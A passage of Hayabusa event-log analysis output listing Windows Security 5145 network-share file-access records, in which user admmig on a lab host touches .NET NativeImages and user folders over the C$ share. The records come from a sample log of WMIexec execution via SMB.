Windows\assembly\NativeImages_v4.0.30319_64\MMCFxCommon | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.193 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\MMCFxCommon\e2ac72add0eac7c6264297f0a580e745 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.193 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\MSBuild | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.193 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\MSBuild\5eda447ab5fd1d3ae7ccfa140388c8b0 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.193 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: 
\\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\mscorlib | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.193 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\a20cafac04a2e9b3bcb5ec4d674775e5 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.193 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\napcrypt | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.193 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\napcrypt\c97155692ee6bc8729624e1a8f6371c1 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.193 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File 
Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\naphlpr | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.193 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\naphlpr\8d352c21be1bcfb356df6fec4b6281ec | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.193 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\napinit | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.209 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\napinit\d39a7c06edcf81bed4470b0a8a5f4bb7 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.209 
+00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\napsnap | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.209 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\napsnap\285c011d18a31026f939f0b45ce83c81 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.209 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio1c968d57# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.209 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio1c968d57#\15c0f15336d9b4baa3bf042b39325008 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management 
Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.209 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio1c9175f8# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.209 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio1c9175f8#\63dfa31687b025a3294657e7d8861b87 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.209 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio1da2af67# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.209 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio1da2af67#\65893eb6f605719418cb19fada199945 | IP Addr: 10.23.23.9 | LID: 
0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.224 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio4b37ff64# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.224 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio4b37ff64#\7258b8e8dc26562f4f79202ba192af07 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.224 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio5ae0f00f# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.224 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Windows\assembly\NativeImages_v4.0.30319_64\Presentatio5ae0f00f#\37aa83ffa60682e364b3caea876452c9 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.224 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio49d6fefe# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.224 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio49d6fefe#\504088f50d79f510c3d363ad5a4c58cc | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.224 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio53a7a42c# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.224 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network 
Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio53a7a42c#\7b19e9c40f25ea7b5ca13312053ab849 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.224 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio080b339b# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.240 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio080b339b#\d47241c3aea71d38b02fd1cd03c55474 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.256 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio84a7b877# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 
+2021-04-22 11:32:32.257 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio84a7b877#\2837fdc670a5c72d64db85e2af347449 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.282 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio84a6349c# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.282 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio84a6349c#\7fac8b827be2ffa333eda4ee3560d8f4 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.282 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatioaec034ca# | IP Addr: 10.23.23.9 | LID: 
0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.282 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatioaec034ca#\155b3e5bd15d88ce27d096bd7c40bd33 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.298 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatiob3047ded# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.313 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatiob3047ded#\991f02d895032e2eca7f6baebab96ddc | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.313 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Windows\assembly\NativeImages_v4.0.30319_64\Presentatiod51afaa5# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.313 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatiod51afaa5#\ee4933bf7dcf5304cb565e4f2b833b24 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.313 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\PresentationCore | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.313 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\PresentationCore\71df43fcb7a7745ef38a6ce40ff33c2d | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.313 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File 
Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\PresentationUI | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.313 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\PresentationUI\16135860bdfd502ca9212ab087e9dd26 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.313 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\ReachFramework | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.313 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\ReachFramework\0dbd8b9aecffc6cde6bb8aab468084f4 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.313 
+00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\SecurityAudf6921413# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.329 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\SecurityAudf6921413#\085b01b1533aaba67cfade21b3bda1a5 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.329 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Documents | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.329 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:33.636 
+00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.23.9 | LID: 0x18b247,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:33.636 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: USERS\ADMMIG\DESKTOP | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:33.636 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.23.9 | LID: 0x18b247,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:33.636 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.23.9 | LID: 